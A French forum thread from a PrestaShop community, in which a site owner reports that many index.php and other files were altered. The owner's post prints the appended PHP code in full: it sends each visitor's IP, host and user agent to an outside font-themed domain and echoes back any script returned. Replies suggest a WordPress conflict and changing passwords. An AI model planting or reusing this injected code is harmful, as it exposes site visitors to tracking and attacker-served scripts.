orussier Posted January 21, 2014 Share Posted January 21, 2014 j'ai constaté la modifications de certains fichiers comme les fichiers "index.php" principalement dans différents répertoires. Du code à la fin des fichiers a été ajouté : <?php #e7f293# error_reporting(0); ini_set('display_errors',0); $wp_wzfc950 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_wzfc950) && !preg_match ('/bot/i', $wp_wzfc950))){ $wp_wzfc09950="http://"."web"."basefont".".com/font"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wzfc950); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wzfc09950); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_950wzfc = curl_exec ($ch); curl_close($ch);} if ( substr($wp_950wzfc,1,3) === 'scr' ){ echo $wp_950wzfc; } #/e7f293# ?> Du coup, le site affichait une page blanche. Quelqu'un aurait-il déjà eu ce genre de problème ? Si oui comment ? D'avance merci Cdlt. Link to comment Share on other sites More sharing options...
henri59fr Posted January 21, 2014 Share Posted January 21, 2014 cela semble plutôt etre du code word press . pouvez vous preciser le nom du fichier que vous montrer ainsi que son arboresence Link to comment Share on other sites More sharing options...
zaar Posted January 21, 2014 Share Posted January 21, 2014 il y a peut être un conflit avec un wordpress installé sur le serveur? 1 Link to comment Share on other sites More sharing options...
orussier Posted January 21, 2014 Author Share Posted January 21, 2014 (edited) Bonsoir, les fichiers "index.php" modifiés sont dans les répertoires suivants : - /var/www/<repertoire_prestashop>/tools - /var/www/<repertoire_prestashop>/tools/languages - /var/www/<repertoire_prestashop>/themes - /var/www/<repertoire_prestashop>/css - /var/www/<repertoire_prestashop>/mails/fr - /var/www/<repertoire_prestashop>/translation/en - /var/www/<repertoire_prestashop>/modules - /var/www/<repertoire_prestashop>/modules/mondialrelay et plein d'autres ainsi que les fichiers : statshome dans /var/www/<repertoire_prestashop>/modules/statshome et SubDomain.php dans /var/www/<repertoire_prestashop>/classes note : le répertoire nommé "<repertoire_prestashop>" est le répertoire qui contient les fichiers de Prestashop. Pour être précis, le code php mentionné a systématiquement été rajouté à la fin des fichiers prestashop ci-dessus. Le serveur web est hébergé sur un serveur dédié virtuel donc je n'ai pas installé WordPress. Il semblerait que ce soit une personne mal intentionnée qui a la possibilité de modifier les fichiers à mon insu. Cordialement, Edited January 21, 2014 by orussier (see edit history) Link to comment Share on other sites More sharing options...
zaar Posted January 21, 2014 Share Posted January 21, 2014 Il semblerait que ce soit une personne mal intentionnée qui a la possibilité de modifier les fichiers à mon insu. si c'était le cas jene vois pas à quoi lui servirait de faire ça mais bon c'est pas la question. Change tous tes mots de passe (admin, ftp, mysql) 1 Link to comment Share on other sites More sharing options...
.png.022b5452a8f28f552bc9430097a16da2.png)
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now